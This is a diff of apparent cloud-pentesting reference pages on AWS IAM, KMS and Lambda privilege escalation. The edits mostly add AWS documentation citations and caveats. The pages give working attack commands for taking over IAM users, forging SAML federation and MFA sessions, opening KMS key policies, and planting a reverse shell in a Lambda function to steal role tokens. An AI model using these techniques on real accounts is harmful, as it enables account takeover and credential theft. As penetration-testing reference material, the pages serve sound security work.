+Permits creating or updating a login profile, including setting the password used for AWS Management Console login, leading to direct privilege escalation when applied to a more privileged user.<sup>[[1]](#references)[[8]](#references)</sup>
 
 **Exploit for Creation:**
 
@@ -111,11 +69,11 @@ aws iam update-login-profile --user-name target_user --no-password-reset-require
     --password '<password>'
 ```
 
-**Impact:** Direct privilege escalation by logging in as "any" user.
+**Impact:** Direct privilege escalation by logging in as the target user, subject to that user having a console password and the account's sign-in and policy controls.<sup>[[1]](#references)[[8]](#references)</sup>
 
 ### **`iam:UpdateAccessKey`**
 
-Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key.
+Allows changing an access key from `Inactive` to `Active`, potentially leading to unauthorized access if the actor possesses the disabled key.<sup>[[9]](#references)</sup>
 
 **Exploit:**
 
@@ -123,11 +81,11 @@ Allows enabling a disabled access key, potentially leading to unauthorized acces
 aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>
 ```
 
-**Impact:** Direct privilege escalation by reactivating access keys.
+**Impact:** Direct privilege escalation by reactivating access keys.<sup>[[9]](#references)</sup>
 
 ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
 
-Enables generating or resetting credentials for specific AWS services (most commonly **CodeCommit**). These are **not** AWS API keys: they are **username/password** credentials for a specific service, and you can only use them where that service accepts them.
+Enables generating or resetting credentials for specific AWS services (most commonly **CodeCommit**). These are **not** general AWS API keys: for CodeCommit they are an IAM-generated username/password pair for HTTPS Git access, and they can only be used with the specified service.<sup>[[10]](#references)[[11]](#references)</sup>
 
 **Creation:**
 
@@ -135,7 +93,7 @@ Enables generating or resetting credentials for specific AWS services (most comm
 aws iam create-service-specific-credential --user-name <target_user> --service-name codecommit.amazonaws.com
 ```
 
-Save:
+Save the returned service username and password.<sup>[[10]](#references)</sup>
 
 - `ServiceSpecificCredential.ServiceUserName`
 - `ServiceSpecificCredential.ServicePassword`
@@ -157,9 +115,9 @@ git clone "$CLONE_URL"
 cd "$REPO_NAME"
 ```
 
-> Note: The service password often contains characters like `+`, `/` and `=`. Using the interactive prompt is usually easiest. If you embed it into a URL, URL-encode it first.
+> Note: The service password often contains characters like `+`, `/` and `=`. Using the interactive prompt is usually easiest. If you embed it into a URL, URL-encode it first. AWS returns the password only when the credential is created or reset.<sup>[[10]](#references)[[12]](#references)</sup>
 
-At this point you can read whatever the target user can access in CodeCommit (e.g., a leaked credentials file). If you retrieve **AWS access keys** from the repo, configure a new AWS CLI profile with those keys and then access resources (for example, read a flag from Secrets Manager):
+At this point you can read whatever the target user can access in CodeCommit (e.g., a leaked credentials file). If you retrieve **AWS access keys** from the repo, configure a new AWS CLI profile with those keys and then access resources (for example, read a flag from Secrets Manager). The HTTPS clone URL must target the repository's Region, and the generated Git credentials authenticate only to CodeCommit.<sup>[[11]](#references)[[13]](#references)</sup>
 
 ```bash
 aws secretsmanager get-secret-value --secret-id <secret_name> --profile <new_profile>
@@ -171,11 +129,11 @@ aws secretsmanager get-secret-value --secret-id <secret_name> --profile <new_pro
 aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>
 ```
 
-**Impact:** Privilege escalation into the target user's permissions for the given service (and potentially beyond if you pivot using data retrieved from that service).
+**Impact:** Privilege escalation into the target user's permissions for the given service, with possible further access only if data retrieved from that service contains additional credentials or secrets.<sup>[[1]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
 
-Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
+Allows attaching managed policies to users or groups, directly escalating privileges when the actor can attach a policy to a principal they control or can otherwise use. Attaching a policy applies its permissions to that identity.<sup>[[1]](#references)[[14]](#references)</sup>
 
 **Exploit for User:**
 
@@ -189,11 +147,11 @@ aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"
 aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"
 ```
 
-**Impact:** Direct privilege escalation to anything the policy grants.
+**Impact:** Direct privilege escalation to the permissions granted by the attached policy, subject to boundaries, SCPs, resource policies, and explicit denies.<sup>[[1]](#references)[[14]](#references)</sup>
 
-### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
+### **`iam:AttachRolePolicy`**, (`sts:AssumeRole` | `iam:CreateRole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
 
-Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions.
+Permits attaching managed policies or embedding inline policies in roles, users, or groups, enabling direct privilege escalation when the affected principal is usable by the actor. Inline policies are embedded in the identity and apply their permissions to it.<sup>[[1]](#references)[[14]](#references)</sup>
 
 **Exploit for Role:**
 
@@ -229,11 +187,11 @@ You can use a policy like:
 }
 ```
 
-**Impact:** Direct privilege escalation by adding permissions through policies.
+**Impact:** Direct privilege escalation by adding permissions through policies, subject to boundaries, SCPs, resource policies, and explicit denies.<sup>[[1]](#references)[[14]](#references)</sup>
 
 ### **`iam:AddUserToGroup`**
 
-Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.
+Enables adding oneself to an IAM group, escalating privileges by inheriting policies attached to that group. IAM groups apply the same permissions policies across their members.<sup>[[1]](#references)[[15]](#references)</sup>
 
 **Exploit:**
 
@@ -241,11 +199,11 @@ Enables adding oneself to an IAM group, escalating privileges by inheriting the 
 aws iam add-user-to-group --group-name <group_name> --user-name <username>
 ```
 
-**Impact:** Direct privilege escalation to the level of the group's permissions.
+**Impact:** Direct privilege escalation to the level of the group's effective permissions, subject to boundaries, SCPs, resource policies, and explicit denies.<sup>[[1]](#references)[[15]](#references)</sup>
 
 ### **`iam:UpdateAssumeRolePolicy`**
 
-Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions.
+Allows altering the trust policy of a role, changing who can assume it. If the actor can also call `sts:AssumeRole` and the role has useful permissions, this can enable privilege escalation.<sup>[[1]](#references)[[16]](#references)</sup>
 
 **Exploit:**
 
@@ -271,11 +229,11 @@ Where the policy looks like the following, which gives the user permission to as
 }
 ```
 
-**Impact:** Direct privilege escalation by assuming any role's permissions.
+**Impact:** Direct privilege escalation by assuming the affected role's permissions, provided the trust policy and caller permissions both allow `sts:AssumeRole`.<sup>[[1]](#references)[[16]](#references)</sup>
 
 ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
 
-Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
+Permits uploading an SSH public key for authenticating the specified IAM user to CodeCommit and deactivating that user's MFA device, leading to potential indirect privilege escalation. The uploaded key is usable only for CodeCommit authentication.<sup>[[11]](#references)[[17]](#references)[[18]](#references)</sup>
 
 **Exploit for SSH Key Upload:**
 
@@ -289,11 +247,11 @@ aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_
 aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>
 ```
 
-**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.
+**Impact:** Indirect privilege escalation by enabling CodeCommit access as the target user or by removing an MFA control, subject to the target's other permissions and authentication requirements.<sup>[[1]](#references)[[11]](#references)[[18]](#references)</sup>
 
 ### **`iam:ResyncMFADevice`**
 
-Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.
+Allows resynchronization of an MFA device with its IAM resource object by submitting two consecutive codes. This can be relevant to privilege escalation when the actor controls or can otherwise use the device, but resynchronization alone does not grant permissions.<sup>[[19]](#references)</sup>
 
 **Bash Command:**
 
@@ -302,13 +260,13 @@ aws iam resync-mfa-device --user-name <username> --serial-number <serial_number>
     --authentication-code1 <code1> --authentication-code2 <code2>
 ```
 
-**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.
+**Impact:** Potential indirect privilege escalation through control of a usable MFA device; the operation itself only resynchronizes an existing device.<sup>[[19]](#references)</sup>
 
 ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
 
-With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it.
+`iam:UpdateSAMLProvider` can replace the XML metadata for an existing SAML provider. `iam:ListSAMLProviders` and `iam:GetSAMLProvider` help discover the provider ARN and back up its current metadata. If the provider is trusted by IAM roles, a replacement metadata document can redirect SAML federation to an IdP whose signing key the actor controls.<sup>[[20]](#references)[[21]](#references)[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
-Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back
+Replacing the metadata is disruptive: users relying on the original IdP may be unable to authenticate until the original document is restored. The SAML provider metadata must identify the issuer and include keys AWS can use to validate SAML assertions; `AssumeRoleWithSAML` also requires a role trust policy that names the provider and an assertion containing the required claims.<sup>[[20]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 # List SAMLs
@@ -320,7 +278,7 @@ aws iam get-saml-provider --saml-provider-arn <ARN>
 # Update SAML provider
 aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>
 
-## Login impersonating roles that trust the SAML provider
+# Login by assuming roles that trust the SAML provider
 
 # Optional: Set the previous XML back
 aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>
@@ -328,7 +286,7 @@ aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-prov
 
 **End-to-end attack:**
 
-1. Enumerate the SAML provider and a role that trusts it:
+1. Enumerate the SAML provider and a role that trusts it. The role trust policy must allow `sts:AssumeRoleWithSAML`:<sup>[[16]](#references)[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 export AWS_REGION=${AWS_REGION:-us-east-1}
@@ -345,7 +303,7 @@ aws iam get-role --role-name "<ROLE_NAME>"
 export ROLE_ARN="arn:aws:iam::<ACCOUNT_ID>:role/<ROLE_NAME>"
 ```
 
-2. Forge IdP metadata + a signed SAML assertion for the role/provider pair:
+2. Forge IdP metadata + a signed SAML assertion for the role/provider pair. The metadata embeds the certificate used to verify the assertion, while the assertion identifies the role and SAML provider:<sup>[[20]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 python3 -m venv /tmp/saml-federation-venv
@@ -424,8 +382,9 @@ def _pem_cert_to_b64(cert_pem: str) -> str:
 
 
 def make_metadata_xml(cert_b64: str) -> str:
+    valid_until = (dt.datetime.now(dt.timezone.utc) + dt.timedelta(days=3650)).replace(microsecond=0).isoformat().replace("+00:00", "Z")
     return f"""<?xml version="1.0"?>
-<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp">
+<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp" validUntil="{valid_until}">
   <IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
     <KeyDescriptor use="signing">
       <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
@@ -562,7 +521,7 @@ if __name__ == "__main__":
 
 </details>
 
-3. Update the SAML provider metadata to your IdP certificate, assume the role, and use the returned STS credentials:
+3. Update the SAML provider metadata to your IdP certificate, assume the role, and use the returned STS credentials. `AssumeRoleWithSAML` accepts the provider ARN, role ARN, and base64-encoded SAML response and returns temporary credentials:<sup>[[20]](#references)[[24]](#references)</sup>
 
 ```bash
 aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
@@ -580,7 +539,7 @@ AWS_ACCESS_KEY_ID="$SESSION_AK" AWS_SECRET_ACCESS_KEY="$SESSION_SK" AWS_SESSION_
   aws sts get-caller-identity
 ```
 
-4. Cleanup: restore previous metadata:
+4. Cleanup: restore the previous metadata with `UpdateSAMLProvider`:<sup>[[20]](#references)[[21]](#references)</sup>
 
 ```bash
 python3 - <<'PY'
@@ -593,33 +552,37 @@ aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
 ```
 
 > [!WARNING]
-> Updating SAML provider metadata is disruptive: while your metadata is in place, legitimate SSO users might not be able to authenticate.
+> Updating SAML provider metadata is disruptive: while your metadata is in place, legitimate SSO users might not be able to authenticate.<sup>[[20]](#references)[[23]](#references)</sup>
 
 ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
 
-(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider.
+`iam:UpdateOpenIDConnectProviderThumbprint` replaces the complete list of TLS server-certificate thumbprints for an existing OIDC provider. AWS normally validates the provider's JWKS endpoint with a trusted root CA and uses configured thumbprints when that validation is unavailable or the provider uses an untrusted CA. A thumbprint update alone does not let an actor assume roles trusting the provider; successful federation still requires a valid, provider-signed token and a matching role trust policy. If an actor also controls the provider endpoint and signing keys, changing the thumbprint can affect whether AWS accepts that provider's TLS connection.<sup>[[25]](#references)[[26]](#references)</sup>
+
+Each thumbprint must be exactly 40 characters.<sup>[[25]](#references)</sup>
 
 ```bash
 # List providers
 aws iam list-open-id-connect-providers
 # Optional: Get Thumbprints used to not delete them
 aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
-# Update Thumbprints (The thumbprint is always a 40-character string)
-aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
+# Update Thumbprints (each thumbprint is a 40-character string)
+aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> \
+  --thumbprint-list 0123456789abcdef0123456789abcdef01234567
 ```
 
 ### `iam:PutUserPermissionsBoundary`
 
-This permissions allows an attacker to update the permissions boundary of a user, potentially escalating their privileges by allowing them to perform actions that are normally restricted by their existing permissions.
+This permission allows an actor to set or replace a user's permissions boundary. A boundary defines the maximum permissions that identity-based policies can grant; it does not grant permissions by itself. Privilege escalation is possible only when the user already has identity-based policy grants that the new boundary permits, while a narrower boundary can cause service disruption.<sup>[[27]](#references)[[28]](#references)</sup>
 
 ```bash
 aws iam put-user-permissions-boundary \
   --user-name <nombre_usuario> \
- --permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>
+  --permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>
+```
 
-Un ejemplo de una política que no aplica ninguna restricción es:
+For example, this managed policy places no effective action restriction on the boundary. It still does not grant access by itself; the user also needs identity-based permissions.<sup>[[27]](#references)[[28]](#references)</sup>
 
-
+```json
 {
   "Version": "2012-10-17",
   "Statement": [
@@ -635,7 +598,7 @@ Un ejemplo de una política que no aplica ninguna restricción es:
 
 ### `iam:PutRolePermissionsBoundary`
 
-An actor with iam:PutRolePermissionsBoundary can set a permissions boundary on an existing role. The risk arises when someone with this permission changes a role’s boundary: they can improperly restrict operations (causing service disruption) or, if they attach a permissive boundary, effectively expand what the role can do and escalate privileges.
+An actor with `iam:PutRolePermissionsBoundary` can set or replace a permissions boundary on an existing role. The boundary limits the maximum permissions that the role's identity-based policies can grant and does not grant permissions by itself. A broader boundary can make existing role policy grants effective, while a narrower boundary can cause service disruption.<sup>[[27]](#references)[[29]](#references)</sup>
 
 ```bash
 aws iam put-role-permissions-boundary \
@@ -643,10 +606,22 @@ aws iam put-role-permissions-boundary \
   --permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy
 ```
 
-### `iam:CreateVirtualMFADevice`, `iam:EnableMFADevice`, CreateVirtualMFADevice & `sts:GetSessionToken`
-The attacker creates a virtual MFA device under their control and attaches it to the target IAM user, replacing or bypassing the victim’s original MFA. Using the seed of this attacker-controlled MFA, they generate valid one-time passwords and request an MFA-authenticated session token via STS. This allows the attacker to satisfy the MFA requirement and obtain temporary credentials as the victim, effectively completing the account takeover even though MFA is enforced.
+### **`iam:CreateVirtualMFADevice`, `iam:EnableMFADevice`, and the target user's access keys**
 
-If the target user already has MFA, deactivate it (`iam:DeactivateMFADevice`):
+An actor who can create a virtual MFA device and attach it to a target IAM user can generate that device's one-time passwords. This does **not** provide the target user's credentials: to call `GetSessionToken` as that user, the actor must already possess the target user's long-term access key credentials. The technique can then obtain an MFA-authenticated session and make permissions conditioned on `aws:MultiFactorAuthPresent` usable. AWS does not require or evaluate an IAM permission for the `GetSessionToken` authentication operation. AWS supports up to eight MFA devices per IAM user; deactivating an existing device is therefore optional and should be done only when required by the test or account configuration.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+
+You can use any TOTP tool; `oathtool` is one lightweight option:
+
+```bash
+sudo apt install oathtool
+sudo dnf install oathtool
+sudo yum install oathtool
+
+# Alternatively, generate a current code from the Base32 seed:
+oathtool --base32 --totp "$(tr -d '\n' </tmp/mfa-seed.txt)"
+```
+
+If the target user's existing MFA must be removed for the test, deactivate it (`iam:DeactivateMFADevice`):<sup>[[4]](#references)[[18]](#references)</sup>
 
 ```bash
 aws iam deactivate-mfa-device \
@@ -654,7 +629,7 @@ aws iam deactivate-mfa-device \
   --serial-number arn:aws:iam::ACCOUNT_ID:mfa/EXISTING_DEVICE_NAME
 ```
 
-Create a new virtual MFA device (writes the seed to a file)
+Create a new virtual MFA device (writes the seed to a file):<sup>[[5]](#references)</sup>
 
 ```bash
 aws iam create-virtual-mfa-device \
@@ -685,7 +660,7 @@ print(totp(now))
 print(totp(now + 30))
 ```
 
-Enable MFA device on the target user, replace MFA_SERIAL_ARN, CODE1, CODE2:
+Enable the MFA device on the target user with `MFA_SERIAL_ARN`, `CODE1`, and `CODE2`:<sup>[[6]](#references)</sup>
 
 ```bash
 aws iam enable-mfa-device \
@@ -695,7 +670,7 @@ aws iam enable-mfa-device \
   --authentication-code2 CODE2
 ```
 
-Generate a current token code (for STS)
+Generate a current token code for STS:
 ```python
 import base64, hmac, hashlib, struct, time
 
@@ -711,7 +686,7 @@ code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
 print(f"{code:06d}")
 ```
 
-Copy the printed value as TOKEN_CODE and request an MFA-backed session token (STS):
+Using the target IAM user's long-term access keys, copy the printed value as `TOKEN_CODE` and request an MFA-backed session token. `GetSessionToken` returns temporary credentials with the same permissions as the IAM user whose credentials made the call, while the MFA context can satisfy policies that require MFA.<sup>[[7]](#references)</sup>
 
 ```bash
 aws sts get-session-token \
@@ -721,6 +696,34 @@ aws sts get-session-token \
 
 ## References
 
-- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [1] [AWS IAM Privilege Escalation – Methods and Mitigation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+- [2] [Versioning IAM policies](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-versioning.html)
+- [3] [Manage access keys for IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html)
+- [4] [AWS Multi-factor authentication in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html)
+- [5] [create-virtual-mfa-device – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/create-virtual-mfa-device.html)
+- [6] [enable-mfa-device – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/enable-mfa-device.html)
+- [7] [get-session-token – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html)
+- [8] [User passwords in AWS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_passwords.html)
+- [9] [update-access-key – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/update-access-key.html)
+- [10] [create-service-specific-credential – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/create-service-specific-credential.html)
+- [11] [IAM credentials for CodeCommit: Git credentials, SSH keys, and AWS access keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_ssh-keys.html)
+- [12] [reset-service-specific-credential – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/reset-service-specific-credential.html)
+- [13] [Getting started with Git and AWS CodeCommit](https://docs.aws.amazon.com/codecommit/latest/userguide/getting-started.html)
+- [14] [Adding and removing IAM identity permissions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-attach-detach.html)
+- [15] [Edit users in IAM groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups_manage_add-remove-users.html)
+- [16] [Update a role trust policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_update-role-trust-policy.html)
+- [17] [upload-ssh-public-key – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/upload-ssh-public-key.html)
+- [18] [deactivate-mfa-device – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/deactivate-mfa-device.html)
+- [19] [resync-mfa-device – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/resync-mfa-device.html)
+- [20] [UpdateSAMLProvider – AWS IAM API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html)
+- [21] [GetSAMLProvider – AWS IAM API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetSAMLProvider.html)
+- [22] [ListSAMLProviders – AWS IAM API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListSAMLProviders.html)
+- [23] [SAML 2.0 federation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_saml.html)
+- [24] [AssumeRoleWithSAML – AWS STS API Reference](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html)
+- [25] [UpdateOpenIDConnectProviderThumbprint – AWS IAM API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateOpenIDConnectProviderThumbprint.html)
+- [26] [Create an OpenID Connect (OIDC) identity provider in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_oidc.html)
+- [27] [Permissions boundaries for IAM entities](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_boundaries.html)
+- [28] [put-user-permissions-boundary – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/put-user-permissions-boundary.html)
+- [29] [put-role-permissions-boundary – AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/iam/put-role-permissions-boundary.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - KMS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## KMS
 
 For more info about KMS check:
@@ -12,7 +10,7 @@ For more info about KMS check:
 
 ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)
 
-With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone:
+With these permissions, an actor can identify a key and use `kms:PutKeyPolicy` on a customer managed key to change the principals and actions allowed by its single key policy, including granting access to another account or a wildcard principal. Cross-account use additionally requires an IAM policy in the external account.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws kms list-keys
@@ -53,7 +51,7 @@ policy.json:
 
 ### `kms:CreateGrant`
 
-It **allows a principal to use a KMS key:**
+`kms:CreateGrant` lets an authorized principal create a grant that gives a specified grantee permission to perform selected operations on one KMS key.<sup>[[4]](#references)[[6]](#references)</sup>
 
 ```bash
 aws kms create-grant \
@@ -63,22 +61,22 @@ aws kms create-grant \
 ```
 
 > [!WARNING]
-> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations).<sup>[[4]](#references)[[6]](#references)</sup>
 
 > [!WARNING]
 > Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\
 > However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\
-> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
+> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).<sup>[[4]](#references)[[5]](#references)[[7]](#references)</sup>
 
 ```bash
 # Use the grant token in a request
 aws kms generate-data-key \
     --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
-    –-key-spec AES_256 \
+    --key-spec AES_256 \
     --grant-tokens $token
 ```
 
-Note that it's possible to list grant of keys with:
+Note that it's possible to list grants for a key with:<sup>[[4]](#references)[[8]](#references)</sup>
 
 ```bash
 aws kms list-grants --key-id <value>
@@ -86,9 +84,11 @@ aws kms list-grants --key-id <value>
 
 ### `kms:CreateKey`, `kms:ReplicateKey`
 
-With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.
+With these permissions, an actor can create a replica of a multi-Region primary key in another Region: `kms:ReplicateKey` must be allowed on the primary key, while `kms:CreateKey` must be allowed by an IAM policy effective in the replica Region. The replica has its own key policy, so it can use a different policy from the primary.<sup>[[9]](#references)[[10]](#references)</sup>
 
-So, an attacker could abuse this to obtain privesc his access to the key and use it
+An attacker could abuse this to create a replica whose permissive key policy grants access to the replica.<sup>[[9]](#references)[[10]](#references)</sup>
+
+Setting `--bypass-policy-lockout-safety-check` skips the key-policy lockout safety check and increases the risk that the new key becomes unmanageable.<sup>[[10]](#references)</sup>
 
 ```bash
 aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
@@ -112,15 +112,28 @@ aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-re
 
 ### `kms:Decrypt`
 
-This permission allows to use a key to decrypt some information.\
+This permission allows a principal to call `Decrypt` to decrypt ciphertext produced by KMS-compatible encryption operations.<sup>[[11]](#references)</sup>\
 For more information check:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-kms-post-exploitation/README.md
 {{#endref}}
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Key policies in AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html)
+- [2] [Change a key policy - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-modifying.html)
+- [3] [Allowing users in other accounts to use a KMS key - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-modifying-external-accounts.html)
+- [4] [Grants in AWS KMS - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html)
+- [5] [Using a grant token - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/using-grant-token.html)
+- [6] [create-grant - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/kms/create-grant.html)
+- [7] [generate-data-key - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/kms/generate-data-key.html)
+- [8] [list-grants - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/kms/list-grants.html)
+- [9] [Control access to multi-Region keys - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/multi-region-keys-auth.html)
+- [10] [ReplicateKey - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_ReplicateKey.html)
+- [11] [Decrypt - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_Decrypt.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Lambda Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## lambda
 
 More info about lambda in:
@@ -10,13 +8,13 @@ More info about lambda in:
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
+### `iam:PassRole`, `lambda:CreateFunction`, `lambda:InvokeFunction`
 
 Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\
 They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\
-Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\
+Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[6]](#references)</sup>\\
 
-A attacker could abuse this to get a **rev shell and steal the token**:
+An attacker could abuse this to get a **rev shell** and steal the token. Lambda provides the execution role's temporary credentials to the function, so the code below returns them in the invocation output.<sup>[[4]](#references)</sup>
 
 ```python:rev.py
 import socket,subprocess,os,time
@@ -49,7 +47,7 @@ aws iam list-attached-user-policies --user-name <user-name>
 ```
 
